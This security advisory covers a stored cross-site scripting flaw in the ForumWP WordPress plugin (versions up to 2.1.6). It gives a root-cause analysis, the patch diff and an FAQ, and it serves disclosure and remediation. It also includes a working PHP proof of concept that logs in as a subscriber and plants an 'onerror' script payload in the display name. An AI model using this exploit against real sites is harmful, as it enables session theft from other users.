What is CVE-2025-13746?

CVE-2025-13746 is a stored cross-site scripting (XSS) vulnerability in the ForumWP plugin for WordPress. It allows authenticated users with Subscriber-level access or higher to inject malicious scripts via their display name, which can then execute in the browsers of other users.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the user card template. When an attacker modifies their display name to include malicious scripts, these scripts are rendered on pages viewed by other users, leading to potential session hijacking or other malicious actions.

Who is affected by this vulnerability?

Any WordPress site using ForumWP version 2.1.6 or earlier is affected. Additionally, only authenticated users with Subscriber-level permissions or higher can exploit this vulnerability, making it a concern for sites with user registration and forum capabilities.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the ForumWP plugin installed. If it is version 2.1.6 or earlier, your site is at risk. Additionally, you can review user display names for any suspicious scripts.

What versions are affected and patched?

The vulnerable version of the ForumWP plugin is 2.1.6. The issue has been patched in version 2.1.7, which implements proper output escaping to mitigate the XSS risk.

How can I fix the vulnerability?

To fix the vulnerability, update the ForumWP plugin to version 2.1.7 or later. Regularly check for updates to ensure your plugins are secure and up-to-date.

What does the CVSS score of 6.4 indicate?

A CVSS score of 6.4 indicates a medium severity level, suggesting that while the vulnerability requires authentication to exploit, it can lead to significant consequences such as session hijacking. Administrators should treat it as a serious issue that needs prompt attention.

What practical risks does this vulnerability pose?

The practical risks include the possibility of attackers executing scripts in the context of other users, which can lead to stolen session cookies, unauthorized actions, or redirection to malicious sites. This could compromise user data and trust in the forum.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can authenticate to a WordPress site, modify their display name to include a malicious payload, and then cause that payload to execute when other users view their posts or profiles. This illustrates the ease of exploitation for an authenticated user.

What preventive measures can I take?

In addition to updating the plugin, consider implementing security plugins that monitor for XSS vulnerabilities, enforce strict input validation, and regularly audit user permissions. Educating users about secure practices can also help mitigate risks.

How can I report further issues or seek help?

If you discover further issues or need assistance, report them to the plugin developers or your hosting provider. Additionally, consider reaching out to the WordPress security community for guidance and support.

Is there a way to test for this vulnerability without exploiting it?

Yes, you can test for this vulnerability by checking if the display name field allows HTML or JavaScript input without sanitization. Use a controlled environment to avoid affecting live sites, and ensure you have permission to test.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-13746: ForumWP – Forum & Discussion Board <= 2.1.6 – Authenticated (Subscriber+) Stored Cross-Site Scripting via Display Name (forumwp)

CVE ID CVE-2025-13746

Plugin forumwp

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 2.1.6

Patched Version 2.1.7

Disclosed January 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13746:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the ForumWP WordPress plugin. The vulnerability affects the user display name field, allowing attackers with Subscriber-level permissions or higher to inject malicious scripts. These scripts execute when other users view pages containing the attacker’s display name, such as forum posts or user cards. The CVSS score of 6.4 reflects the moderate impact of authenticated XSS requiring user interaction.

The root cause is insufficient output escaping in the user card template rendering function. The vulnerable code resides in forumwp/includes/common/class-user.php at line 916. The get_card() method uses ob_get_clean() to capture template output without applying any sanitization. This function renders the user-card.php template, which directly echoes the user’s display name. The plugin fails to escape this output before returning it to the frontend, allowing JavaScript execution.

Exploitation requires an authenticated attacker with at least Subscriber permissions. The attacker updates their WordPress profile display name through the standard WordPress user profile edit page (/wp-admin/profile.php). The payload is inserted into the ‘Display name publicly as’ field. When the attacker creates forum topics or replies, or when their user card appears elsewhere, the malicious display name renders without escaping. Any user viewing content containing the attacker’s name triggers the script execution in their browser context.

The patch addresses the vulnerability by applying output escaping via wp_kses() in the get_card() method. The changed line 916 now reads ‘return wp_kses( ob_get_clean(), FMWP()->get_allowed_html( ‘templates’ ) );’. This function filters the captured template output, removing any HTML tags not explicitly allowed. The patch also adds ‘allowed_html’ to localized script data in two enqueue classes, providing consistent allowed HTML definitions between PHP and JavaScript contexts. Before the patch, raw template output returned unsanitized. After the patch, all template output passes through the allowed HTML filter.

Successful exploitation allows attackers to perform actions within the victim’s WordPress session. Attackers can steal session cookies, perform actions as the victim (like posting malicious content), redirect users to malicious sites, or deface forum pages. While the vulnerability requires authentication, Subscriber is the default WordPress role with minimal permissions, making widespread exploitation feasible. The stored nature means a single payload affects all users viewing infected content.

Differential between vulnerable and patched code

Code Diff

--- a/forumwp/forumwp.php
+++ b/forumwp/forumwp.php
@@ -3,7 +3,7 @@
  * Plugin Name: ForumWP
  * Plugin URI: https://forumwpplugin.com/
  * Description: A full-featured, powerful forum plugin for WordPress
- * Version: 2.1.6
+ * Version: 2.1.7
  * Author: ForumWP
  * License: GPLv3
  * License URI: http://www.gnu.org/licenses/gpl-3.0.txt
--- a/forumwp/includes/common/class-enqueue.php
+++ b/forumwp/includes/common/class-enqueue.php
@@ -234,9 +234,10 @@
 			$localize_data = apply_filters(
 				'fmwp_enqueue_localize',
 				array(
-					'can_reply' => is_user_logged_in() && current_user_can( 'fmwp_post_reply' ),
-					'can_topic' => is_user_logged_in() && current_user_can( 'fmwp_post_topic' ),
-					'nonce'     => wp_create_nonce( 'fmwp-frontend-nonce' ),
+					'can_reply'    => is_user_logged_in() && current_user_can( 'fmwp_post_reply' ),
+					'can_topic'    => is_user_logged_in() && current_user_can( 'fmwp_post_topic' ),
+					'nonce'        => wp_create_nonce( 'fmwp-frontend-nonce' ),
+					'allowed_html' => FMWP()->get_allowed_html( 'templates' ),
 				)
 			);
 			wp_localize_script( 'fmwp-front-global', 'fmwp_front_data', $localize_data );
--- a/forumwp/includes/common/class-user.php
+++ b/forumwp/includes/common/class-user.php
@@ -913,7 +913,7 @@

 			FMWP()->get_template_part( 'user-card', $user );

-			return ob_get_clean();
+			return wp_kses( ob_get_clean(), FMWP()->get_allowed_html( 'templates' ) );
 		}

 		/**
--- a/forumwp/includes/frontend/class-enqueue.php
+++ b/forumwp/includes/frontend/class-enqueue.php
@@ -53,9 +53,10 @@
 			$localize_data = apply_filters(
 				'fmwp_enqueue_localize',
 				array(
-					'can_reply' => is_user_logged_in() && current_user_can( 'fmwp_post_reply' ),
-					'can_topic' => is_user_logged_in() && current_user_can( 'fmwp_post_topic' ),
-					'nonce'     => wp_create_nonce( 'fmwp-frontend-nonce' ),
+					'can_reply'    => is_user_logged_in() && current_user_can( 'fmwp_post_reply' ),
+					'can_topic'    => is_user_logged_in() && current_user_can( 'fmwp_post_topic' ),
+					'nonce'        => wp_create_nonce( 'fmwp-frontend-nonce' ),
+					'allowed_html' => FMWP()->get_allowed_html( 'templates' ),
 				)
 			);
 			wp_localize_script( 'fmwp-front-global', 'fmwp_front_data', $localize_data );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13746 - ForumWP – Forum & Discussion Board <= 2.1.6 - Authenticated (Subscriber+) Stored Cross-Site Scripting via Display Name
<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'attacker';
$password = 'password';
$payload = '<img src=x onerror=alert(document.cookie)>';

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_2025_13746');

$ch = curl_init($login_url);
curl_setopt_array($ch, [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
]);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Extract nonce from profile page
$profile_url = $target_url . '/wp-admin/profile.php';
$ch = curl_init($profile_url);
curl_setopt_array($ch, [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEFILE => $cookie_file,
]);
$response = curl_exec($ch);
curl_close($ch);

// Parse nonce from HTML
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

// Step 3: Update display name with XSS payload
$update_url = $target_url . '/wp-admin/profile.php';
$ch = curl_init($update_url);
curl_setopt_array($ch, [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'from' => 'profile',
        'checkuser_id' => '',
        'display_name' => $payload,
        'nickname' => 'attacker',
        'first_name' => '',
        'last_name' => '',
        'url' => '',
        'description' => '',
        '_wpnonce' => $nonce,
        '_wp_http_referer' => '/wp-admin/profile.php',
        'submit' => 'Update Profile'
    ]),
    CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 4: Cleanup
unlink($cookie_file);

if ($http_code === 200 && strpos($response, 'Profile updated') !== false) {
    echo "[+] Payload injected successfully. Display name set to: $payloadn";
    echo "[+] The XSS will trigger when users view the attacker's posts or profile.n";
} else {
    echo "[-] Injection failed. Check credentials and permissions.n";
}

?>

Frequently Asked Questions

What is CVE-2025-13746?
Overview of the vulnerability
CVE-2025-13746 is a stored cross-site scripting (XSS) vulnerability in the ForumWP plugin for WordPress. It allows authenticated users with Subscriber-level access or higher to inject malicious scripts via their display name, which can then execute in the browsers of other users.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the user card template. When an attacker modifies their display name to include malicious scripts, these scripts are rendered on pages viewed by other users, leading to potential session hijacking or other malicious actions.
Who is affected by this vulnerability?
Identifying vulnerable users and sites
Any WordPress site using ForumWP version 2.1.6 or earlier is affected. Additionally, only authenticated users with Subscriber-level permissions or higher can exploit this vulnerability, making it a concern for sites with user registration and forum capabilities.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the ForumWP plugin installed. If it is version 2.1.6 or earlier, your site is at risk. Additionally, you can review user display names for any suspicious scripts.
What versions are affected and patched?
Vulnerable and fixed versions
The vulnerable version of the ForumWP plugin is 2.1.6. The issue has been patched in version 2.1.7, which implements proper output escaping to mitigate the XSS risk.
How can I fix the vulnerability?
Updating the plugin
To fix the vulnerability, update the ForumWP plugin to version 2.1.7 or later. Regularly check for updates to ensure your plugins are secure and up-to-date.
What does the CVSS score of 6.4 indicate?
Understanding the severity rating
A CVSS score of 6.4 indicates a medium severity level, suggesting that while the vulnerability requires authentication to exploit, it can lead to significant consequences such as session hijacking. Administrators should treat it as a serious issue that needs prompt attention.
What practical risks does this vulnerability pose?
Potential impacts on users and systems
The practical risks include the possibility of attackers executing scripts in the context of other users, which can lead to stolen session cookies, unauthorized actions, or redirection to malicious sites. This could compromise user data and trust in the forum.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept shows how an attacker can authenticate to a WordPress site, modify their display name to include a malicious payload, and then cause that payload to execute when other users view their posts or profiles. This illustrates the ease of exploitation for an authenticated user.
What preventive measures can I take?
Best practices for security
In addition to updating the plugin, consider implementing security plugins that monitor for XSS vulnerabilities, enforce strict input validation, and regularly audit user permissions. Educating users about secure practices can also help mitigate risks.
How can I report further issues or seek help?
Getting support for vulnerabilities
If you discover further issues or need assistance, report them to the plugin developers or your hosting provider. Additionally, consider reaching out to the WordPress security community for guidance and support.
Is there a way to test for this vulnerability without exploiting it?
Safe testing methods
Yes, you can test for this vulnerability by checking if the display name field allows HTML or JavaScript input without sanitization. Use a controlled environment to avoid affecting live sites, and ensure you have permission to test.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations